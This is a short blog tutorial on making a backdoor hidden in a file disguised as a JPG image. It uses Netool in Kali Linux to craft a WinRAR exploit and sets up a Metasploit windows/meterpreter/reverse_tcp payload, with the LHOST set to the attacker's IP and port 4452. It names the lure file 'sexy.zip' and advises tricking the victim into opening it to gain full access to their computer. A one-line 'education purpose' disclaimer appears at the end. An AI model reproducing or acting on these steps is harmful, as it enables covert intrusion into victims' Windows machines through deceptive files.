How A VIRUS (Backdoor) Is Hiding In JPG File.


In My tutorial now is about How to create a virus that is inputted to a extension file .rar and .jpg  (image format). This method is very helpful for a hacker who wants to gain access to the target using an incognito file. So the backdoor that we created using netool will hide in the jpg file. When a target opens the file in windows 7.8, or 10 then the attacker will begin to have full access to the target.

We can download Netool in Here

Ok we start to the tutorial.
  • Open Netool in Kali Linux.


  • Pick number 8 for Rootsector Exploits


  • Set Interface in Use
  • Im using Wlan0


  • Next Pick number 17 ( Winrar backdoor)
  • Press Enter


  • Set Your IP Address
  • Click OK


  • Input File name
  • For Zip extension
  • Click Ok


  • Set Input Spoof File
  • Set extension .jpg
  • Click Ok


  • Msfconsole will Launch
  • And you can see Location for file backdoor


  • Type show options
  • set FILENAME sexy.zip
  • set LPORT 4452

  • Next, Type exploit
  • And you can see location a backdoor


  • Type "set payload windows/meterpreter/reverse_tcp"


  • Set LHOST "Your Ip Address"
  • Set Port 4452


  • Type exploit
  • for Start Exploitation


  • In Windows Victim.
  • You must your brain how the victim will open a file (Backdoor)


  • Then, if the victim Open a backdoor
  • You have access the computer victim.
  • Success!!!


Now you are a hacker.
But remember,. This method only for EDUCATION PURPOSE.!!
If something happens to you using this method, I am not responsible
Happy Learning Guys (y)
For Tutorial Version Video. Check Below!...
Thnks..

Subscribe to receive free email updates:

0 Response to "How A VIRUS (Backdoor) Is Hiding In JPG File. "

Post a Comment